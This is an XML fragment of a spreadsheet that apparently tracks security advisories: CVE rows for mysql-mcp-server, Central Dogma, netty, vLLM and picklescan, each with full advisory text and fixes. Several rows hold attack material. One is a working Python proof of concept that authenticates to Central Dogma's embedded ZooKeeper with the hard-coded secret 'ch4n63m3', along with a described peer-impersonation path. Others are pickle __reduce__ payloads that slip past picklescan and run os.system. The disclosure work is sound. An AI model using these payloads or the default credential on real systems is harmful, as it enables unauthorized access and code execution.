      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>pip:mysql-mcp-server</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr">
        <is>
          <t>0.4.2</t>
        </is>
      </c>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr"/>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-346</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>## Summary
In SSE/HTTP transport mode, `mysql_mcp_server` constructs `SseServerTransport` without passing `security_settings`. As a result, the MCP Python SDK's DNS-rebinding protection (Origin/Host header validation) is disabled; the Starlette application has no CORS or TrustedHost middleware; and the service binds to `0.0.0.0` by default with no authentication on any route.
**Trigger condition:** `MCP_TRANSPORT=sse`. The default stdio mode is not affected.
## Attack Scenarios
**Scenario A — Direct exposure:** Any network attacker can invoke `execute_sql` to run arbitrary SQL without credentials → full data dump, and via MySQL `FILE` privileges, arbitrary file read/write and RCE.
**Scenario B — DNS rebinding (local bind):** An attacker lures a victim's browser to a malicious page, rebinds their domain to `127.0.0.1`, and uses the browser as a proxy to invoke `execute_sql` as same-origin.
## Root Cause
In `src/mysql_mcp_server/server.py`:
1. `SseServerTransport` is constructed without `security_settings` — the SDK defaults `enable_dns_rebinding_protection` to `False`.
2. The Starlette app has no CORS or TrustedHost middleware.
3. All three routes (`/`, `/sse`, `/messages/`) are unauthenticated.
4. The service binds to `0.0.0.0` by default.
5. The sink is `cursor.execute(query)` with a fully attacker-controlled query.
## Impact
- Unauthenticated arbitrary SQL execution against the configured database
- Full data exfiltration and modification
- If the MySQL account holds `FILE` privilege: arbitrary file read (`LOAD_FILE`) and write (`INTO OUTFILE`) — potential RCE via webshell drop
- Internet-wide scanning has identified 25 publicly reachable SSE instances of this project
## Fix
Released in v0.4.2: DNS-rebinding protection is now enabled by passing `TransportSecuritySettings(enable_dns_rebinding_protection=True)` to `SseServerTransport`, and the documented recommended bind address is `127.0.0.1`.
## Credits
Discovered by Huanchen, SongWu (JHU), and BrookeYangRui (JHU).</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59971</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S78"/>
  <conditionalFormatting sqref="E2:E7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78">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P2 - High</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11746</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
`ZooKeeperReplicationConfig.secret()` silently substitutes the hard-coded constant `"ch4n63m3"` (leetspeak for "change me") whenever the operator omits `replication.secret`. The same secret is wired into both the **client-facing SASL context** and the **quorum/learner SASL contexts** of the embedded ZooKeeper. The constant is in OSS source on GitHub and is discoverable via code search in seconds.
### Three Reinforcing Defects
1. **OSS-public credential** — `DEFAULT_SECRET` is in `line/centraldogma` source.
2. **Silent fallback** — `firstNonNull(convertValue(...), DEFAULT_SECRET)` substitutes the default with no log, no warning, no startup banner. The only sanity check `checkArgument(!secret().isEmpty(), ...)` passes because the getter substitutes the literal before the emptiness check runs.
3. **Dual-purpose secret** — used for both ZK client-port super auth and inter-peer quorum SASL. A single leaked password authenticates against both surfaces.
### Architecture Context (Important)
Central Dogma does **NOT** connect to an external ZooKeeper ensemble. Each replica embeds a `QuorumPeer` (`EmbeddedZooKeeper extends QuorumPeer`) inside its own JVM. The Central Dogma cluster **IS** the ZK ensemble. So the "ZK network" is the inter-replica network of the Central Dogma cluster itself.
### Applicability
| `replication.method` | ZK Started? | Applicable? |
|---|---|---|
| `NONE` (standalone, dev default) | No | **NOT applicable** |
| `ZOOKEEPER` (HA production) | Yes, embedded on every replica | **Fully applicable** — canonical production configuration |
---
## Evidence
**File:** `server/src/main/java/com/linecorp/centraldogma/server/ZooKeeperReplicationConfig.java`
**Branch:** `main` @ commit `d64a5151`
**Line 53** — the constant:
```java
private static final String DEFAULT_SECRET = "ch4n63m3";
```
**Lines 210–215** — the silent fallback:
```java
/**
 * Returns the secret string used for authenticating the ZooKeeper peers.
 */
public String secret() {
    return firstNonNull(convertValue(secret, "replication.secret"), DEFAULT_SECRET);
}
```
---
**File:** `server/src/main/java/com/linecorp/centraldogma/server/internal/replication/ZooKeeperCommandExecutor.java`
**Lines 586–607** — JAAS wiring (same secret on both surfaces):
```java
final String escapedSecret = jaasValueEscaper.escape(cfg.secret());
ImmutableList.of("Server", EmbeddedZooKeeper.SASL_SERVER_LOGIN_CONTEXT).forEach(name -&gt; {
    buf.append(name).append(" {").append(newline);
    buf.append(DigestLoginModule.class.getName()).append(" required").append(newline);
    buf.append("user_super=\"").append(escapedSecret).append("\";").append(newline);
    buf.append("};").append(newline);
});
ImmutableList.of("Client", EmbeddedZooKeeper.SASL_LEARNER_LOGIN_CONTEXT).forEach(name -&gt; {
    buf.append(name).append(" {").append(newline);
    buf.append(DigestLoginModule.class.getName()).append(" required").append(newline);
    buf.append("username=\"super\"").append(newline);
    buf.append("password=\"").append(escapedSecret).append("\";").append(newline);
    buf.append("};").append(newline);
});
```
---
**File:** `server/src/main/java/com/linecorp/centraldogma/server/internal/replication/EmbeddedZooKeeper.java`
**Line 44** — proves CD embeds the ZK server:
```java
final class EmbeddedZooKeeper extends QuorumPeer {
```
**Lines 213–220** — client port binding (loopback only):
```java
private static ServerCnxnFactory createCnxnFactory(QuorumPeerConfig zkCfg) throws IOException {
    final InetSocketAddress bindAddr = zkCfg.getClientPortAddress();
    final ServerCnxnFactory cnxnFactory = ServerCnxnFactory.createFactory();
    // Listen only on 127.0.0.1 because we do not want to expose ZooKeeper to others.
    cnxnFactory.configure(new InetSocketAddress("127.0.0.1", bindAddr != null ? bindAddr.getPort() : 0),
                          zkCfg.getMaxClientCnxns());
    return cnxnFactory;
}
```
&gt; Quorum/election ports are **NOT** loopback-bound — they bind to `replication.servers[].host` as configured, exposed on the inter-replica network.
---
## PoC
Two attack surfaces, two scenarios. **Surface A** (client port, same-host) is implemented as a working read-only PoC. **Surface B** (quorum-port peer impersonation) is documented but intentionally not weaponized.
### Surface A — Same-Host Client Port (Loopback) PoC
Python + kazoo + pure-sasl. Authenticates as `super` over SASL DIGEST-MD5 with the leaked secret and reads the full Central Dogma replication log. Hardcoded to `127.0.0.1`, read-only, prints first 5 entries.
```python
#!/usr/bin/env python3
"""
C3 PoC -- ZooKeeper default-secret takeover (read-only, loopback only).
Demonstrates that a Central Dogma instance launched with a
ZooKeeper-replicated configuration but without `replication.secret` set
exposes its embedded ZooKeeper to anyone with local-host access, using
the well-known credential `super / ch4n63m3`.
SAFETY:
  * Hardcoded to 127.0.0.1. Refuses any other target.
  * Read-only. No writes are issued. No nodes are deleted.
  * Limits how much data it prints (first MAX_LOGS entries).
"""
from __future__ import annotations
import sys
from kazoo.client import KazooClient
from kazoo.exceptions import NoNodeError
HOST = "127.0.0.1"
DEFAULT_PORT = 2381
DEFAULT_USER = "super"
DEFAULT_SECRET = "ch4n63m3"  # ZooKeeperReplicationConfig.DEFAULT_SECRET
MAX_LOGS = 5
def main() -&gt; int:
    port = int(sys.argv[1]) if len(sys.argv) &gt; 1 else DEFAULT_PORT
    if HOST != "127.0.0.1":
        print("Refusing to run against non-loopback host.", file=sys.stderr)
        return 2
    zk = KazooClient(
        hosts=f"{HOST}:{port}",
        sasl_options={
            "mechanism": "DIGEST-MD5",
            "username": DEFAULT_USER,
            "password": DEFAULT_SECRET,
        },
        read_only=True,
        timeout=5.0,
    )
    try:
        zk.start(timeout=5)
    except Exception as exc:
        print(f"[!] Could not reach {HOST}:{port} -- {exc}", file=sys.stderr)
        return 1
    try:
        try:
            log_children = zk.get_children("/dogma/logs")
        except NoNodeError:
            print("[i] /dogma/logs not present -- is replication actually enabled?")
            log_children = []
        print(f"[+] Authenticated as '{DEFAULT_USER}' with default secret.")
        print(f"[+] /dogma/logs has {len(log_children)} entries.")
        for child in sorted(log_children)[:MAX_LOGS]:
            path = f"/dogma/logs/{child}"
            try:
                data, stat = zk.get(path)
            except NoNodeError:
                continue
            preview = data[:120].decode("utf-8", errors="replace") if data else ""
            print(f"  - {path}  ({stat.dataLength} bytes)  preview={preview!r}")
        try:
            block_children = zk.get_children("/dogma/log_blocks")
            print(f"[+] /dogma/log_blocks has {len(block_children)} entries.")
        except NoNodeError:
            pass
        print(
            f"[!] ZK cluster compromised: read {len(log_children)} log entries "
            "with default credentials."
        )
        return 0
    finally:
        zk.stop()
        zk.close()
if __name__ == "__main__":
    raise SystemExit(main())
```
**Dependencies** (`requirements.txt`): `kazoo`, `pure-sasl`
**Setup:** edit `dist/src/conf/dogma.json` to enable replication **WITHOUT** setting secret:
```json
{
  "replication": {
    "method": "ZOOKEEPER",
    "serverId": 1,
    "servers": {
      "1": { "host": "127.0.0.1", "quorumPort": 2382, "electionPort": 2383, "clientPort": 2381 }
    }
  }
}
```
&gt; **Note:** `replication.secret` is **INTENTIONALLY** omitted. Launch with `./gradlew :dist:startup`.
**Run:**
```bash
python3 zk_takeover.py 2381
```
**Expected output (VULNERABLE):**
```
[+] Authenticated as 'super' with default secret.
[+] /dogma/logs has 14 entries.
  - /dogma/logs/0000000001  (412 bytes)  preview="{"size":..."
  - /dogma/logs/0000000002  (508 bytes)  preview="{"size":..."
  ...
[+] /dogma/log_blocks has 14 entries.
[!] ZK cluster compromised: read 14 log entries with default credentials.
```
After the patch (fail-closed on null/placeholder secret), Central Dogma **refuses to start at all** with this config.
### Surface B — Inter-Replica Quorum-Port Peer Impersonation (Documented, Not Weaponized)
Quorum/election ports bind to the configured `replication.servers[].host`, **NOT** to loopback. In typical HA deployments (multi-DC, K8s with NetworkPolicy gaps, shared VPC), these ports are reachable from peer workloads.
**Attack path:**
1. Attacker reaches the quorum port of any Central Dogma replica from a co-located workload (same K8s namespace, same VLAN, etc.).
2. Attacker spins up their own Apache ZooKeeper process configured with:
   - matching `serverId` (or a new one if the `QuorumVerifier` allows dynamic membership)
   - JAAS `QuorumLearner` / `QuorumServer` digest contexts using `super / ch4n63m3`
   - `quorumServerSaslAuthRequired=true`, `quorumLearnerSaslAuthRequired=true`
3. Attacker's process joins the quorum as a learner. SASL handshake passes because the secret matches.
4. Attacker now receives every replicated `Command`, can attempt to win leader election, and once in the cluster can write to `/dogma/logs/` directly — which `ZooKeeperCommandExecutor.replayLogs()` will deserialize and execute on every legitimate replica.
**Dangerous Commands the attacker can replay across the cluster** (from `Command.java:46-68`):
| Command | Impact |
|---|---|
| `PURGE_PROJECT` | Permanent deletion |
| `ROTATE_SESSION_MASTER_KEY` / `REWRAP_ALL_KEYS` | Pivot encryption-at-rest layer to attacker-controlled keys |
| `UPDATE_SERVER_STATUS` (read-only / maintenance) | Denial of Service |
| `CREATE_SESSION` with crafted user info | Session forgery |
&gt; This PoC is **intentionally NOT shipped as runnable code**. It is closer to an attack tool than a verification artifact, and the audit's purpose is to drive the fix, not to provide weaponization. The Surface A PoC plus this documentation are sufficient to motivate remediation.
---
## Impact
### Threat Model (Realistic for LINE Corporate Deployment)
- Multi-tenant K8s where Central Dogma StatefulSet shares Pod network with other workloads
- Or shared VPC/VLAN where the inter-replica quorum traffic is reachable from co-tenant hosts
- Or single-tenant cluster where any sidecar/co-located process has loopback access (Surface A)
### What an Attacker Gains with the Leaked Secret
1. **Read the full replication log.** `/dogma/logs` + `/dogma/log_blocks` contain the Zstd-compressed `ReplicationLog` entries — every commit, every `PUSH` payload (with file contents), every credential mutation, every session/master-key management command. Includes `CREATE_SESSION_MASTER_KEY`, `ROTATE_SESSION_MASTER_KEY`, `REWRAP_ALL_KEYS`. Reading this effectively renders the encryption-at-rest layer moot because the master-key management commands themselves traverse ZK.
2. **Write to the replication log (Surface B).** Forged `LogMeta` + `log_blocks` entries are auto-replayed by `ZooKeeperCommandExecutor.replayLogs()` on every replica. The attacker gains **arbitrary Command execution on the entire cluster**.
3. **Join the quorum as a fake peer (Surface B).** With the secret, an attacker reachable on the inter-replica network can pose as a legitimate replica, receive all future commits in real time, and potentially win leadership.
**Scope is Changed** (CVSS) because ZK is a separate security authority from Central Dogma's HTTP API, and the impact propagates to every microservice consuming Central Dogma configuration via watch.
**Incident recovery cost:** secret rotation alone is insufficient. Every `Command` that traversed ZK during the compromise window must be audited. If master-key rotation commands were issued, all encryption-at-rest data must be re-encrypted. This is an **extremely high-blast-radius failure mode** for a single missing config knob.
**Historical analogue:** this is the same anti-pattern that caused Mirai (2016, IoT default credentials), pre-2018 unauthenticated Hadoop YARN clusters, and the recurring ZK / Elasticsearch / MongoDB internet-exposed-without-auth incidents 2018–2024.
---
## How to Fix
**Remove the default constant. Fail closed when `replication.secret` is missing or matches the legacy placeholder.**
```java
// ZooKeeperReplicationConfig.java
// REMOVE: private static final String DEFAULT_SECRET = "ch4n63m3";
@JsonCreator
ZooKeeperReplicationConfig(/* ...unchanged params... */
                           @JsonProperty("secret") @Nullable String secret,
                           /* ... */) {
    // ...
    final String resolved = convertValue(secret, "replication.secret");
    checkArgument(resolved != null &amp;&amp; !resolved.isEmpty(),
                  "'replication.secret' must be set (and non-empty) when " +
                  "ZooKeeper replication is enabled. There is no default; " +
                  "generate a long random string and configure it on every " +
                  "replica.");
    // Reject the historical placeholder explicitly so existing config files
    // copy-pasted from old tutorials fail loudly instead of silently.
    checkArgument(!"ch4n63m3".equals(resolved),
                  "'replication.secret' is set to the legacy placeholder " +
                  "value. Replace it with a fresh random secret " +
                  "(`openssl rand -hex 32`).");
    // Optional: enforce minimum length (32 chars) and reject obvious placeholders.
    checkArgument(resolved.length() &gt;= 32,
                  "'replication.secret' must be at least 32 characters. " +
                  "Use `openssl rand -hex 32` to generate one.");
    this.secret = resolved;
}
public String secret() {
    return secret;  // never null at this point
}
```</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11746</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11745</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server-mirror-git</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-322</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t># Vulnerability
Central Dogma's Git mirror SSH client installs an Apache MINA SSHD `ServerKeyVerifier` lambda that returns `true` unconditionally for every outbound SSH connection used by `git+ssh://` mirrors. The accompanying lines disable the `known_hosts` and `~/.ssh/config` fallbacks, and a repo-wide search confirms that no host-key pinning mechanism (no `acceptedHostKeys`, `knownHosts`, `KnownHostsServerKeyVerifier`, `StaticServerKeyVerifier`, or `RequiredServerKeyVerifier`) exists anywhere in `server-mirror-git/`. Operators have no opt-in way to enable verification. Every outbound mirror connection blindly trusts whatever host key the remote presents.
## Evidence
File: `server-mirror-git/src/main/java/com/linecorp/centraldogma/server/internal/mirror/SshGitMirror.java`
Lines 143-160 (especially 149) on branch `main` @ commit `d64a5151`:
```java
private SshClient createSshClient() {
    final ClientBuilder builder = ClientBuilder.builder();
    // Do not use local file system.
    builder.hostConfigEntryResolver(HostConfigEntryResolver.EMPTY);   // line 146
    builder.fileSystemFactory(NoneFileSystemFactory.INSTANCE);        // line 147
    // Do not verify the server key.
    builder.serverKeyVerifier((clientSession, remoteAddress, serverKey) -&gt; true);  // line 149
    ...
}
```
Verification:
- Read confirmed on 2026-05-21 against `main` @ `d64a5151`.
- A multi-agent code audit verified that no operator-facing pinning field exists on `SshKeyCredential`, `PasswordCredential`, or `MirrorContext`.
- Exploit PoC reproduced locally with a `paramiko`-based fake SSH server bound to 127.0.0.1. The fake server presents an ephemeral RSA host key never seen before; the Central Dogma mirror client accepts the connection and proceeds to authentication, logging the offered username and public-key fingerprint. A correctly hardened SSH client would refuse the connection before reaching the authentication phase.
- Full PoC artifacts (read-only, loopback-only) at `~/centraldogma-poc/C1_ssh_hostkey_bypass/` on the reporter's workstation.
## Impact
Threat model: An on-path attacker on the corporate network — ARP spoofing on the LAN, internal DNS poisoning, malicious internal DNS overriding `github.com` or the configured internal git hostname, BGP hijack, sidecar/CNI compromise in Kubernetes, or any process able to answer TCP on the resolved IP. No Central Dogma account required; only network position.
1. **Direction `LOCAL_TO_REMOTE`**: the attacker impersonating the remote git server receives the entire mirrored repository contents over the SSH session. Central Dogma is a configuration store, so this typically exfiltrates DB credentials, third-party API keys, certificates, feature flags, and any other secret configuration committed to mirrored repositories.
2. **Direction `REMOTE_TO_LOCAL`**: the attacker can serve arbitrary commits which Central Dogma materializes into the local repo and then broadcasts to every subscribing microservice via the watch API. This is a supply-chain root-of-trust compromise across all downstream services consuming Central Dogma configuration.
3. **Credential theft chain with finding H2** (mirror credentials are not bound to a hostname): an SSH key or access token configured for `github.com` can be captured by the attacker's fake server and replayed against the real upstream, extending impact beyond Central Dogma itself.
Scope is `Changed` (CVSS) because exploitation alters trust assumptions of every downstream client of Central Dogma, not just Central Dogma itself.
## How to fix
1. Add an `acceptedHostKeys: List&lt;String&gt;` field to `SshKeyCredential` and `PasswordCredential` (or to `MirrorContext`). Values are SHA-256 fingerprints of trusted remote SSH server host keys, e.g. `SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8`.
2. Replace the accept-all lambda at `SshGitMirror.java:149` with a verifier that computes the SHA-256 fingerprint of the presented host key and compares it against the credential's allowlist using a constant-time comparison.
3. Refuse to connect when `acceptedHostKeys` is empty — fail-closed. Do not implement implicit TOFU.
4. Optionally provide an admin-only `dogma mirror probe-host-key &lt;remote&gt;` tool that performs a single audited connection, prints the server's fingerprint, and prompts the operator to add it to the credential. This makes TOFU an explicit, audited operation.
5. Update `SshGitMirrorTest.java` and `it/mirror/*` tests to pin a test fingerprint or use the explicit trust-once tool, so the regression cannot silently return.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11745</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48059</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-codec-haproxy</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-1286</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>### Impact
The HAProxy PROXY protocol v2 codec in netty leaks native or heap memory on every connection when a client sends a syntactically valid header containing nested `PP2_TYPE_SSL` TLVs (type-length-value records) at depth two or greater. The leak occurs on the successful parse path — no exception is thrown, the message fires downstream, the decoder removes itself, and the application releases the `HAProxyMessage` normally. Yet the underlying cumulation buffer (a pooled, potentially direct `ByteBuf` allocated by the channel) remains permanently pinned.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48059</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>GHSA-78fp-cf4h-g36p</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>0.13.0</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-787</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-mcmc-2m55-j8jj. This link is maintained to preserve external references.
### Original Description
vLLM versions &gt;= 0.10.2 and &lt; 0.13.0 are missing sparse tensor validation in multimodal embeddings processing. Because PyTorch disables sparse tensor invariant checks by default, an attacker can submit crafted embedding requests with malformed (negative or out-of-bounds) tensor indices, when the prompt-embeds feature is enabled, to trigger crashes or resource exhaustion (denial of service), with potential for out-of-bounds/write-what-where memory corruption. This continues CVE-2025-62164, whose prior fix only disabled the feature by default rather than addressing the root cause.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-78fp-cf4h-g36p</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71348</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>0.0.28</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the torch.utils._config_module.load_config function via the __reduce__ method. Then the victim checks whether the pickle file is safe using the Picklescan library. Because the library fails to detect any dangerous functions, the victim decides to pickle.load() this malicious file, leading to remote code execution.
### PoC
```
import pickle
from torch.utils._config_module import ConfigModule
class Evil:
    def __reduce__(self):
        return (os.system, ('whoami',))
class EvilTorchUtilsConfigModuleLoadConfig:
    def __reduce__(self):
        evil_payload = pickle.dumps(Evil())
        return ConfigModule.load_config, (None, evil_payload)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6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71348</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71357</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using idlelib.pyshell.ModifiedInterpreter.runcommand function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcommand function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
from idlelib.pyshell import ModifiedInterpreter
from types import SimpleNamespace
class EvilIdlelibPyshellModifiedInterpreterRuncommand:
    def __reduce__(self):
        payload = "__import__('os').system('whoami')"
        fake_self = SimpleNamespace(
            locals={},
            tkconsole=SimpleNamespace(executing=False),
            rpcclt=None,
            debugger=None
        )
        return ModifiedInterpreter.runcommand, (fake_self, payload)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7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71357</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>GHSA-8mc5-7w9m-fqv6</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
